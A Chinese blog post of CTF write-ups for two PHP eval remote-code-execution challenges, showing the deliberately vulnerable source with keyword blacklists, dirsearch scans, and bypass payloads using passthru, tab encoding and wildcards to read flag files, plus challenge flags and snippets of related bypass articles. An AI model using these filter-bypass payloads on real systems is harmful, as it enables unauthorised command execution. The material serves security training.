有回显代码执行-分号和下划线绕过

最新推荐文章于 2024-04-28 16:00:00 发布
最新推荐文章于 2024-04-28 16:00:00 发布
阅读量448 收藏 8
点赞数 3
分类专栏: windows linux CTF 文章标签: 网络 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/asdfaa/article/details/125938745
版权
linux 同时被 3 个专栏收录
12 篇文章 1 订阅
订阅专栏
windows
8 篇文章 0 订阅
订阅专栏
CTF
7 篇文章 0 订阅
订阅专栏

[题目信息]:

题目名称题目难度
有回显代码执行-分号和下划线绕过1

[题目考点]:

远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。

以下是可能会造成任意命令执行的函数

system|passthru|exec|popen|proc_open|move_uploaded_file|eval|copy|shell_exec|assert

[Flag格式]:

SangFor{1K7BysNwDaR194srIngQhykMKTKu4RZv}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:5010

[题目writeup]:

1、实验主页

2、使用dirsearch扫描网站目录

python dirsearch.py -u http://分配ip/ -e php -t 20

flag.php文件存在。

3、代码分析

<?php
ini_set("display_errors", "On");
error_reporting(E_ALL | E_STRICT);
if(isset($_GET['c'])){
  $c = $_GET['c'];
  if(!preg_match("/flag|system|cat|sort|shell|\_|\.| |\'|\`|echo|\;/i", $c)){
    eval($c);
  }
}
else{
  highlight_file(__FILE__);

}

eval — 把字符串作为PHP代码执行;

由于过滤了下划线“_”无法使用,同时也过滤了分号‘“’;因为php语言中每一行代码需要以分号结尾。但可以使用php语言中,if(){}或者while{}语句绕过分号限制;

空格可以使用%09绕过,flag以及点好”.“可以使用星号”*“绕过;

【payload】

c=if(passthru("tac%09fla*")){}

[题目信息]:

题目名称题目难度
有回显代码执行-关键字绕过(训练题03)1

[题目考点]:

远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。

以下是可能会造成任意命令执行的函数

system|passthru|exec|popen|proc_open|move_uploaded_file|eval|copy|shell_exec|assert

[Flag格式]:

SangFor{ejE-EultrEpfzvvOvSUCU_St_BXeJwJL}

[环境部署]:

docker-compose.yml文件或者docker tar原始文件。

http://分配ip:5008

[题目writeup]:

1、实验主页

2、使用dirsearch扫描网站目录

python dirsearch.py -u http://分配ip/ -e php -t 20

未找到flag.php文件;

3、代码分析

 <?PHP
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }

}else{
highlight_file(FILE);
}
?>

eval — 把字符串作为PHP代码执行;

填入的内容:?c=passthru(“ls”);

最后分号满足php代码格式;

可以利用上题中的各种方式尝试绕过;

【payload】

?c=passthru("find%09/%09-name%09fl*");#搜索flag文件
?c=passthru("tac%09/fl?g");

27-5 文件上传漏洞 -大小写、空格、点、下划线绕过
weixin_43263566的博客
03-18 229
通过查看源码靶场的第5关是黑名单过滤,而且只是过滤了 php 这些,代码中没有转换大小写所以可以使用大小写写绕过,但是windows系统大小写不敏感,所以我们需要使用bp抓包然后将文件后缀名改成大小写。因为在实际情况中我们一般是那不到对方的源码的,一个个的手动测试太浪费时间,成功率也低,这种情况就可以使用bp绕过。之前我有写过几篇文章详细介绍过bp工具的使用,这里我就直接介绍当前用到的操作其他的就不多说了。设置要爆破的变量为文件后缀名,其他的都清除。
php绕过分号(;)和尖括号(<>)转义
逗比大师的博客
03-24 2350
实战中发现可写文件且内容可控,尝试写入phpinfo,发现分号(;)和尖括号(<>)被转义,如:尝试写入 <?php phpinfo();?> 实际得到: \<?php phpinfo()\;?\> 分析分号(;)和尖括号(<>)两处转义,其中第一个尖括号转义不属于php内部,不起到转义作用,只是一个普通文本,不需要处理,第二个尖括号可以不...
关于命令执行漏洞绕过过滤的讨论
最新发布
2301_80127209的博客
04-28 798
今天和各位大佬一起发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。在实际绕过中,可以用多种方式来组合测试进行绕过,可以看出本篇多次使用各种组合来执行命令,主要是希望哥哥们多去尝试,发散思维。
php分号问题
qq_41046329的博客
12-10 1311
在php开始过程中,有看到句末用分号,又有看到不要分号的。有时不用分号可以,有时不用分号又报错了,这到底是怎么回事呢? 其实是这样的:在php中,各个语句使用分号隔开。 这句话里面有这么几个意思: 1、只有一句的,不需要分号。 2、有多句的,每两个语句之间需要分号。 3、最后一句后面不需要分号。...
PHP 中实体符号 绕过eval Bypass
a3320315的博客
06-22 1535
多的就不介绍了 直接看图吧
关于;号绕过认证的安全漏洞问题
m0_56033865的博客
06-07 2364
1、HttpServletRequest中URL解析函数url=host+uri(工程名+servlet路径) 漏洞出在,当后台程序使用getRequestURI()或getRequestURL()函数来解析用户请求的URL时,若URL中包含了一些特殊符号,则可能会造成访问限制绕过的安全风险,其中分号;就是其一。问题出在tomcat对URL特殊字符的处理上 1.分号; 在URL中遇到;号会将;xxx/中的分号与斜杠之间的字符串以及分号本身都去掉: 2.斜杆/ 判断是否有连续的/,存在的话则循环删除掉多余的
php代码审计总结(上)
今天也要加油鸭
08-02 1328
一、审计前的准备 1、核心配置详解 register_globals 全局变量注册开关 PHP5.4.0以下可用 allow_url_include 是否允许文件包含 php5.2.0及以后默认off magic_quotes_gpc 魔术引号自动过滤,GET/POST/COOKIE的变量符号前加\进行转义 php5.4以下版本可用 magic_quotes_runtime...
攻防世界-web高手进阶区
zji
04-25 6656
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界-web进阶区
楼阁de猫的博客
10-30 998
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
sql注入
zejiiii的博客
02-15 3085
SQL注入 一 注入分类 注入点分类 数字型注入 字符型注入 提交方式分类 提交方式分类 GET 方式注入 POST 方式注入 COOKIE 方式注入 HTTP 头部注入:XFF,UA,REFRERE 是否回显 联合查询 布尔盲注 报错注入 时间盲注 二次注入 堆叠查询(同时执行多条语句) 二 注入判断 工具扫描:网站漏扫工具,AWVS、AppScan、OWASP-ZAP、Nes
SQL注入绕过的技巧总结
12-14
sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是在,还有很多网站带着sql注入漏洞在运行。稍微有点安全意识的朋友应该懂得要做一下sql注入过滤。   SQL注入的绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入的绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多。   一、引号绕过   会使用到引号的地方是在于后的whe
笔记,后期整理
weixin_30278237的博客
08-06 8420
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
禁止分号 注入 php,PHP漏洞全解-命令注入攻击
weixin_34079825的博客
03-09 263
命令注入攻击PHP中可以使用下列5个函数来执行外部的应用程序或函数system、exec、passthru、shell_exec、``(与shell_exec功能相同)函数原型string system(string command, int &return_var)command 要执行的命令return_var 存放执行命令的执行后的状态值string exec (string com...
php rce和绕过
m0_73973498的博客
10-08 3093
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
ctfshow-web入门-命令执行持续更新
weixin_46177345的博客
04-06 419
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 常见命令执行函数 system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 知识点:和cat有相同作用的:tac、more、less、head、tail、nl、sed、sort、uniq、rev tac:倒过来就是cat,是将文件倒着显示,即文章最后一行显示在最上边 tail:tail命令是指定显示文件后若干行的内容 head: 显示前n行的内容
web安全-命令执行漏洞
weixin_61956136的博客
07-25 1991
web安全-命令执行漏洞
Nginx搭建静态资源web服务器、开启文件共享功能-Linux
watt的博客
02-05 3512
1. 启动nginx,准备好静态网页资源放至指定的目录 2.修改nginx.conf配置文件,指定端口,域名,路径等 [root@server /]#vim /usr/local/nginx/conf/nginx.conf server { listen 8080; #使用的端口 serv...
CTF之PHP特性与绕过
Welcome To Myon'Blog !
11-01 1592
A.A被传到URL中是A.A,但是到了php里面则会被转换为A_A,即保证了参数的传递,也避免了被strpos函数查找到;并且,在PHP8之前,如果参数中出现中括号[,那么中括号会被转换成下划线_,但是会出现转换错误,导致如果参数名后面还存在非法字符,则不会继续转换成下划线。在给参数传值时,如果参数名中存在非法字符,比空格和点,则参数名中的点和空格等非法字符都会被替换成下划线。isset()函数用于检查变量是否设置,如果设置了,则 id=$_GET['id'],否则 id=1。
常见php函数绕过
huangyongkang666的博客
03-31 4330
PHP常见函数介绍 1. is_numeric() 函数 作用:检测变量是否为数字或数字字符串。 PHP 版本要求:PHP 4, PHP 5, PHP 7 is_numeric函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后 绕过: ?what=1' ?what=1, ?what=1%00 2.isset函数 **作用:**检测变量是否设置 格式:bool isset ( mixed var [, mixed var [, …]] ) 返回值: 若变量不存在则返
quill的table回显到el-dialog上
04-24
具体实现代码如下: //获取Quill编辑器的HTML内容 var quillContent = quillInstance.getContent(); //将Quill编辑器中的内容插入到el-dialog中 var dialogContent = document.getElementById('dialogContent'); ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值